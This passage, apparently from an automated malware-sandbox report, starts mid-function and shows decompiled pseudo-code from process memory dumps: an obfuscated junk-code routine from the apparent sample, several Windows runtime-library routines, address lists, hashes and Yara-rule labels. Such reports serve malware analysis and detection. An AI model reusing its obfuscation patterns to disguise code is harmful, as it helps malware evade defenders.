				asm("adc eax, 0xdcf62ae9");
				 *0xf1af2104 =  *0xf1af2104 << 0x38;
				_t24 = __eax ^ 0x3804dceb;
				 *0x5dce9b4 = __ebx;
				_t46 =  *0xd43d073d + 1;
				asm("adc ch, [0x4d47fee2]");
				 *0x24cb6707 = _t24;
				 *0x4d49fbcd =  *0x4d49fbcd & __ecx;
				asm("adc edx, 0x7bab7d07");
				_push( *0x4d3b50c0);
				_t25 = _t24 & 0x00000008;
				 *0x432ea1b0 =  *0x432ea1b0 >> 0x92;
				asm("adc [0x8c7c28f], edx");
				 *0x8c7b8da =  *0x8c7b8da ^ _t46;
				asm("adc [0x2ec084fb], eax");
				asm("rol byte [0xc7cd8d30], 0x1f");
				 *0x2628cd08 =  *0x2628cd08 >> 0x31;
				asm("adc ebx, 0xb4cef631");
				_t47 = _t46 &  *0x11319565;
				_push( *0x5309c43b);
				_push(0x7709c433);
				 *0x90d42cf0 =  *0x90d42cf0 & _t25;
				asm("ror byte [0xd9f2050a], 0x10");
				 *0x2ce74a6c = 0xa433e68;
				asm("rcl dword [0xba8f187], 0x4c");
				if(__edi -  *0xa86ea98f < 0) {
					L1:
					asm("rcr dword [0xbba69d09], 0x0");
					asm("rol byte [0x720dc40a], 0x4b");
					asm("ror byte [0xafa61dc9], 0x48");
					 *0xaf4649b4 =  *0xaf4649b4 >> 0x81;
					asm("rcr byte [0x1f0b0ac6], 0x40");
					asm("sbb [0x88943f2], dl");
					 *0xb6b62111 =  *0xb6b62111 >> 0xc9;
					_push( *0x5c79ac2);
					 *0xdee0d3d = _t47;
					asm("adc ebx, 0x485105df");
					return _t25;
				} else {
					asm("sbb ebp, [0x874b578]");
					__esi = __esi ^ 0x854dfacb;
					__eflags =  *0xc7cc8b30 & __ah;
					_t12 = __ebp;
					__ebp =  *0xeaa4ab11;
					 *0xeaa4ab11 = _t12;
					 *0x2477276f =  *0x2477276f ^ __ebx;
					__edx =  *0x4201c2f3;
					 *0x1c2ab622 =  *0x1c2ab622 >> 0x5c;
					__edi = __edi & 0x6b14a3cf;
					 *0xb80209c4 =  *0xb80209c4 - __eax;
					__esp = 0x8f348b9a;
					__ebp =  *0xeaa4ab11 &  *0x97397816;
					__eflags = __ebp;
					if(__ebp != 0) {
						goto L1;
					} else {
						__ebx = __ebx ^ 0xf272ea75;
						 *0x12f9e5b6 =  *0x12f9e5b6 ^ __bh;
						asm("ror dword [0xd3593936], 0x67");
						 *0x30b0b68e =  *0x30b0b68e >> 1;
						 *0xb30182d7 =  *0xb30182d7 >> 0xf7;
						_push(__edx);
						__eax =  *0xae34aec0;
						__eflags =  *0x6a130bef - 0x8f348b9a;
						_t13 = __ebp;
						__ebp =  *0xfdb400c4;
						 *0xfdb400c4 = _t13;
						if( *0x6a130bef >= 0x8f348b9a) {
							goto L1;
						} else {
							__eax = __eax ^  *0xc0249771;
							__eflags = __eax;
							if(__eax == 0) {
								goto L1;
							} else {
								__esi = __esi -  *0xa2a00674;
								__eflags = __ah -  *0xcab116c9;
								 *0xe8574e0c =  *0xe8574e0c << 0x71;
								_push(0x8f348b9a);
								__esi =  *0xcf989f17;
								asm("adc esi, [0x899097bb]");
								 *0x43e46a07 = __esi;
								__eflags = __edi & 0x4d84b5f0;
								asm("sbb edi, [0x5da3d116]");
								 *0xa2cc77bd =  *0xa2cc77bd & 0x8f348b9a;
								__dh = __dh ^ 0x000000a0;
								__al = __al +  *0x698b51b4;
								asm("sbb [0x6228f71c], dh");
								__eflags = __bl -  *0xd8b53eb0;
								if(__bl >=  *0xd8b53eb0) {
									goto L1;
								} else {
									__ecx =  *0xb117d7d * 0x3c42;
									__esi = __esi - 1;
									__ch = __ch |  *0x7eebd880;
									__ah = __ah -  *0x94ca7934;
									asm("adc [0x126da7c6], bh");
									__eflags =  *0xf5d1ca3 & __edi;
									asm("sbb cl, [0x8a3a6be1]");
									__eax = __eax -  *0x37d37692;
									__eflags = __eax;
									if(__eax != 0) {
										goto L1;
									} else {
										 *0x506c5b7a =  *0x506c5b7a - __ebx;
										asm("adc ebp, [0x8bc7f8ff]");
										asm("rcr dword [0x2cf8ecef], 0xcd");
										asm("lodsd");
										asm("sbb ebx, [0x4fbdc9f4]");
										__edi = __edi + 1;
										__dh = __dh -  *0x7d2dcd10;
										asm("ror dword [0x5bda86bf], 0xa9");
										__edi = 0x36ea3add;
										asm("sbb [0xb2c67a1d], ebx");
										 *0x972522ec =  *0x972522ec << 0x3d;
										__eflags =  *0x90bc25db - __ecx;
										asm("rol byte [0xdd3ff23a], 0xbf");
										__ah = __ah - 0x2a;
										 *0xaa77240b =  *0xaa77240b + __edx;
										__eflags = __esi -  *0x4cf02189;
										asm("adc bh, [0x68c136e5]");
										asm("movsw");
										if(__esi <  *0x4cf02189) {
											goto L1;
										} else {
											__ecx = __ecx + 0x2447d172;
											__eflags = 0x36ea3add -  *0xd23c0a3d;
											if(0x36ea3add <  *0xd23c0a3d) {
												goto L1;
											} else {
												__eflags = __ecx - 0xe1344e70;
												__ecx =  *0x675d9d33;
												 *0x64a59ac6 =  *0x64a59ac6 << 0xc5;
												__eflags =  *0x64a59ac6;
												__ebp =  *0x4a669839;
												asm("adc al, 0xca");
												if( *0x64a59ac6 >= 0) {
													goto L1;
												} else {
													__esi =  *0xed6e7e7d * 0xd50;
													__eflags =  *0xed6e7e7d * 0xd50;
													if( *0xed6e7e7d * 0xd50 < 0) {
														goto L1;
													} else {
														__ecx =  *0xe8afae72;
														_pop( *0x91acfb97);
														__ebx =  *0x3b23e7dc;
														asm("sbb ebx, [0x33863123]");
														asm("sbb esi, [0x214ea189]");
														_push(__ebx);
														__bh = __bh |  *0xd46aa7b6;
														asm("adc ebp, [0x80de478c]");
														__ebx = __ebx - 0x790e5e9d;
														__eflags = __ebx;
														__edx = 0x85cb21be;
														if(__ebx < 0) {
															goto L1;
														} else {
															asm("sbb [0x2283f972], edi");
															__eflags = 0x85cb21be - 0xf422f63b;
															asm("sbb [0x54da11b7], dl");
															_push( *0x3f5f9f9c);
															__eflags =  *0xc0b4b53d & __ebx;
															asm("sbb esp, 0xfd6aa3c8");
															__esp = 0xffffffff8f348b9b;
															__esp = 0xffffffff8f348b9b |  *0x1519a309;
															asm("cmpsw");
															asm("sbb edi, 0x3bfa5d6f");
															__edi = 0x36ea3add +  *0xe045df6f;
															__ebp = __ebp | 0x26addd11;
															__ebp = __ebp - 0x4736d9ba;
															 *0x10a1443c =  *0x10a1443c + __al;
															asm("sbb ebx, 0x29cc97d3");
															__edi =  *0x2bdd7d2b;
															 *0x2bdd7d2b = 0x36ea3add +  *0xe045df6f;
															__ecx = __ecx +  *0xdde531f0;
															 *0x2660efeb =  *0x2660efeb << 0x1b;
															__eflags =  *0x2660efeb;
															if( *0x2660efeb > 0) {
																goto L1;
															} else {
																__ebx =  *0xea1c717f * 0xdd2e;
																__eax =  *0x2e1bc8be;
																__esp = __esp + 1;
																__eax = 0x56664616;
																 *0xaae3b8b =  *0xaae3b8b >> 0x5f;
																__bl = __bl ^  *0x64de27b3;
																__ebx =  *0x42eb9769 * 0x95c4;
																asm("sbb [0x1eb5a8d2], al");
																 *0xc7c79030 =  *0xc7c79030 | __al;
																__eflags =  *0xc7c79030;
																 *0xf92c0110 = 8;
																if(__eflags < 0) {
																	goto L1;
																} else {
																	asm("sbb [0x5ad99370], esp");
																	if(__eflags == 0) {
																		goto L1;
																	} else {
																		asm("sbb [0xa3519c74], esp");
																		__esp = __esp &  *0xec70069b;
																		__ebp = __ebp +  *0xd363d513;
																		asm("sbb [0x6a80aaf6], bl");
																		 *0x70036ce4 =  *0x70036ce4 >> 0x9b;
																		__esp = __esp - 1;
																		__eax = 0x56664617;
																		__esp = __esp |  *0x1afb4b9e;
																		asm("scasb");
																		__eax = 0x56664617 |  *0x890f1996;
																		__edx =  *0x1a08af5;
																		asm("cmpsb");
																		__edi = __edi;
																		__eflags =  *0xc6f4e6bd & __esp;
																		return 0x56664617 |  *0x890f1996;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0041b99f
0x0041b9a4
0x0041b9b1
0x0041b9b6
0x0041b9da
0x0041b9db
0x0041b9e1
0x0041b9e6
0x0041b9f8
0x0041b9fe
0x0041ba04
0x0041ba07
0x0041ba0e
0x0041ba1b
0x0041ba21
0x0041ba27
0x0041ba2e
0x0041ba35
0x0041ba41
0x0041ba4a
0x0041ba5a
0x0041ba5f
0x0041ba6b
0x0041ba72
0x0041ba78
0x0041ba8b
0x0041b466
0x0041b466
0x0041b473
0x0041b483
0x0041b491
0x0041b498
0x0041b49f
0x0041b4a5
0x0041b4ae
0x0041b4ba
0x0041b4c3
0x0041b4c9
0x0041ba91
0x0041ba91
0x0041ba97
0x0041ba9d
0x0041baa3
0x0041baa3
0x0041baa3
0x0041baa9
0x0041baaf
0x0041bab5
0x0041babc
0x0041bac2
0x0041bac8
0x0041bace
0x0041bace
0x0041bad4
0x00000000
0x0041bada
0x0041bada
0x0041bae0
0x0041bae6
0x0041baed
0x0041baf3
0x0041bafa
0x0041bafb
0x0041bb00
0x0041bb06
0x0041bb06
0x0041bb06
0x0041bb0c
0x00000000
0x0041bb12
0x0041bb12
0x0041bb12
0x0041bb18
0x00000000
0x0041bb1e
0x0041bb1e
0x0041bb24
0x0041bb2a
0x0041bb31
0x0041bb32
0x0041bb38
0x0041bb3e
0x0041bb44
0x0041bb4a
0x0041bb50
0x0041bb56
0x0041bb59
0x0041bb5f
0x0041bb65
0x0041bb6b
0x00000000
0x0041bb71
0x0041bb71
0x0041bb7b
0x0041bb7c
0x0041bb82
0x0041bb88
0x0041bb8e
0x0041bb94
0x0041bb9a
0x0041bb9a
0x0041bba0
0x00000000
0x0041bba6
0x0041bba6
0x0041bbac
0x0041bbb2
0x0041bbb9
0x0041bbba
0x0041bbc0
0x0041bbc1
0x0041bbc7
0x0041bbce
0x0041bbd4
0x0041bbda
0x0041bbe1
0x0041bbe7
0x0041bbee
0x0041bbf1
0x0041bbf7
0x0041bbfd
0x0041bc03
0x0041bc05
0x00000000
0x0041bc0b
0x0041bc0b
0x0041bc11
0x0041bc17
0x00000000
0x0041bc1d
0x0041bc1d
0x0041bc23
0x0041bc29
0x0041bc29
0x0041bc30
0x0041bc36
0x0041bc38
0x00000000
0x0041bc3e
0x0041bc3e
0x0041bc3e
0x0041bc48
0x00000000
0x0041bc4e
0x0041bc54
0x0041bc55
0x0041bc5b
0x0041bc61
0x0041bc67
0x0041bc6d
0x0041bc6e
0x0041bc74
0x0041bc7a
0x0041bc7a
0x0041bc80
0x0041bc86
0x00000000
0x0041bc8c
0x0041bc8c
0x0041bc92
0x0041bc98
0x0041bc9e
0x0041bca4
0x0041bcaa
0x0041bcb0
0x0041bcb1
0x0041bcb7
0x0041bcb9
0x0041bcbf
0x0041bcc5
0x0041bccb
0x0041bcd1
0x0041bcd7
0x0041bcdd
0x0041bcdd
0x0041bce3
0x0041bce9
0x0041bce9
0x0041bcf0
0x00000000
0x0041bcf6
0x0041bcf6
0x0041bd00
0x0041bd05
0x0041bd06
0x0041bd0c
0x0041bd13
0x0041bd19
0x0041bd25
0x0041bd2b
0x0041bd2b
0x0041bd31
0x0041bd37
0x00000000
0x0041bd3d
0x0041bd3d
0x0041bd43
0x00000000
0x0041bd49
0x0041bd49
0x0041bd50
0x0041bd56
0x0041bd5c
0x0041bd62
0x0041bd69
0x0041bd6a
0x0041bd6b
0x0041bd71
0x0041bd72
0x0041bd78
0x0041bd7e
0x0041bd7f
0x0041bd80
0x0041bd86
0x0041bd86
0x0041bd43
0x0041bd37
0x0041bcf0
0x0041bc86
0x0041bc48
0x0041bc38
0x0041bc17
0x0041bc05
0x0041bba0
0x0041bb6b
0x0041bb18
0x0041bb0c
0x0041bad4

Strings

pN4, xrefs: 0041BC1D

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: pN4
API String ID: 0-1448726375
Opcode ID: c9535f1b5bf2a5e1c3eb1a7ecaa1a1bd150984508970e5043519adabe403c6a4
Instruction ID: ef659e94e25e2ea1f13172303e44e21f2471098d9000fcf2ebc1cff5947a1755
Opcode Fuzzy Hash: c9535f1b5bf2a5e1c3eb1a7ecaa1a1bd150984508970e5043519adabe403c6a4
Instruction Fuzzy Hash: 99A19876909391CFDB02DF38D9967913FB5F342724B08828ED590975D2D738661ACF88

Uniqueness

Uniqueness Score: -1.00%

Function 03012D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E03012D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3105350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3107bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E030597C0();
				}
				if( *0x31079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x31079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03041624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03037D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E030AFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03059520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0304E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0306DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3106901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3106901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03059980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E030595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03037D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03037D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03097016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E030AFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3105350;
							if(_t109 != 0x3105350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E030AFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E030A5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x03012d8a
0x03012d8a
0x03012d92
0x03012d96
0x03012d9e
0x03012da0
0x03012da3
0x03012da5
0x03012da8
0x03012dab
0x03012db2
0x0306f9aa
0x0306f9ab
0x0306f9ae
0x0306f9ae
0x03012db8
0x03012dc2
0x0306f9b9
0x0306f9be
0x0306f9bf
0x0306f9bf
0x03012dcf
0x0306f9c9
0x03012dd5
0x03012dd5
0x03012dd5
0x03012dde
0x03012de1
0x03012e70
0x03012e72
0x03012e72
0x03012de7
0x03012deb
0x03012e7c
0x03012e83
0x03012e85
0x03012e8b
0x03012e8d
0x03012e92
0x03012e92
0x03012e85
0x03012df1
0x03012df7
0x03012df9
0x03012df9
0x03012dfc
0x03012dff
0x03012e02
0x00000000
0x03012e05
0x03012e0c
0x0306f9d9
0x03012e12
0x03012e12
0x03012e12
0x03012e1a
0x0306f9e3
0x0306f9e9
0x0306f9f0
0x0306f9f6
0x0306f9f8
0x0306f9f8
0x0306f9f0
0x03012e23
0x0306fa02
0x0306fa03
0x0306fa05
0x0306fa06
0x00000000
0x03012e29
0x03012e29
0x03012e2e
0x03012e34
0x03012e3e
0x00000000
0x00000000
0x03012e44
0x03012e47
0x03012e4d
0x00000000
0x00000000
0x03012e4f
0x03012e54
0x00000000
0x00000000
0x03012e5a
0x03012e5f
0x03012e9a
0x03012ea4
0x03012ea5
0x03012ea8
0x03012eaf
0x03012eb2
0x03012eb5
0x0306fae9
0x0306faeb
0x0306faed
0x0306faef
0x0306faf7
0x0306faf8
0x0306fafd
0x0306faff
0x0306fb04
0x0306fb04
0x0306faff
0x03012ec0
0x03012ec4
0x03012ec6
0x03012ec8
0x0306fb14
0x0306fb18
0x0306fb1e
0x0306fb21
0x0306fb21
0x03012ece
0x03012ece
0x03012ece
0x03012ed7
0x03012e61
0x03012e63
0x0306fa6b
0x0306fa71
0x0306fa76
0x0306fa78
0x0306fa8a
0x0306fa7a
0x0306fa83
0x0306fa83
0x0306fa8f
0x0306fa91
0x0306fa97
0x0306fa9d
0x0306faa4
0x0306faaa
0x0306faaf
0x0306fab1
0x0306fac3
0x0306fab3
0x0306fabc
0x0306fabc
0x0306fac8
0x0306facb
0x0306fadf
0x0306fadf
0x0306facb
0x0306faa4
0x0306fa91
0x03012e6f
0x03012e6f
0x03012e5f
0x0306fa13
0x0306fa15
0x0306fa17
0x0306fa1f
0x0306fa21
0x0306fa22
0x0306fa25
0x0306fa28
0x0306fa2f
0x0306fa2f
0x0306fa2a
0x0306fa2a
0x0306fa2a
0x0306fa31
0x0306fa34
0x0306fa36
0x0306fa3c
0x0306fa3e
0x0306fa41
0x0306fa43
0x0306fa45
0x0306fa45
0x0306fa41
0x0306fa3c
0x0306fa4a
0x0306fa4f
0x0306fa51
0x0306fa53
0x0306fa56
0x0306fa5b
0x0306fa5e
0x00000000
0x0306fa5e
0x03012e23

Strings

RTL: Re-Waiting, xrefs: 0306FA4A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 8a8dae824fbae5a54810821d0b7b3d097e53085815c39ea4777c9f0a67b84c3e
Instruction ID: e83090570fe3d889e8459f4a125341a6bc10d3128f194aa9dddc410b43d411b1
Opcode Fuzzy Hash: 8a8dae824fbae5a54810821d0b7b3d097e53085815c39ea4777c9f0a67b84c3e
Instruction Fuzzy Hash: 3C614771A03745DFDB31DF68D840BBEB7E9EB49724F180AA9E8119B2C0C7709941C791

Uniqueness

Uniqueness Score: -1.00%

Function 030E0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E030E0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E030DFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E030E1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03059730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E030DA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E030DA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3108b04 >> 0x14) + (_v44 -  *0x3108b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03037D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E030D138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03037D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E030CFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3108724 & 0x00000008) != 0) {
						E030D52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E030E15B5(0x3108ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x030e0eb7
0x030e0eb9
0x030e0ec0
0x030e0ec2
0x030e0ecd
0x030e105b
0x030e105b
0x030e1061
0x030e1066
0x030e1066
0x030e106b
0x030e1073
0x030e1073
0x030e0ed3
0x030e0ed6
0x030e0edc
0x030e0ee0
0x030e0ee7
0x030e0ef0
0x030e0ef5
0x030e0efa
0x030e0efc
0x030e0efd
0x030e0f03
0x030e0f04
0x030e0f06
0x030e0f07
0x030e0f09
0x030e0f0e
0x030e0f14
0x030e0f23
0x030e0f2d
0x030e0f34
0x030e0f34
0x030e0f14
0x030e0f52
0x00000000
0x00000000
0x030e0f58
0x030e0f73
0x030e0f74
0x030e0f79
0x030e0f7d
0x030e0f80
0x030e0f86
0x030e0fab
0x030e0fb5
0x030e0fc6
0x030e0fd1
0x030e0fe3
0x030e0fd3
0x030e0fdc
0x030e0fdc
0x030e0feb
0x030e1009
0x030e1009
0x030e1015
0x030e1027
0x030e1017
0x030e1020
0x030e1020
0x030e102f
0x030e103c
0x030e103c
0x030e1048
0x030e1050
0x030e1050
0x030e1055
0x00000000
0x030e1055
0x030e0f88
0x030e0f9e
0x030e0fa2
0x030e0fa9
0x00000000
0x00000000
0x00000000
0x030e0fa9
0x00000000

Strings

`, xrefs: 030E0F16

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 4aaaa8ddd1775208cc524c5bcaa5e86b1d34846f5b59693c07fba8336a15f6b7
Instruction ID: 458f4dea8138a408b47d5b30adcc791e7c2c07eb06fff29ac598bd894169c0db
Opcode Fuzzy Hash: 4aaaa8ddd1775208cc524c5bcaa5e86b1d34846f5b59693c07fba8336a15f6b7
Instruction Fuzzy Hash: E551BF713093419FD328DF29D884B6BB7E5EBC4714F08092CF9969B690D7B1E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0304F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0304F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03034120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03059830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03059990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E030595D0();
							goto L11;
						} else {
							_t109 = L03034620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0305F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E030595D0();
										L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0304f0d3
0x0304f0d9
0x0304f0e0
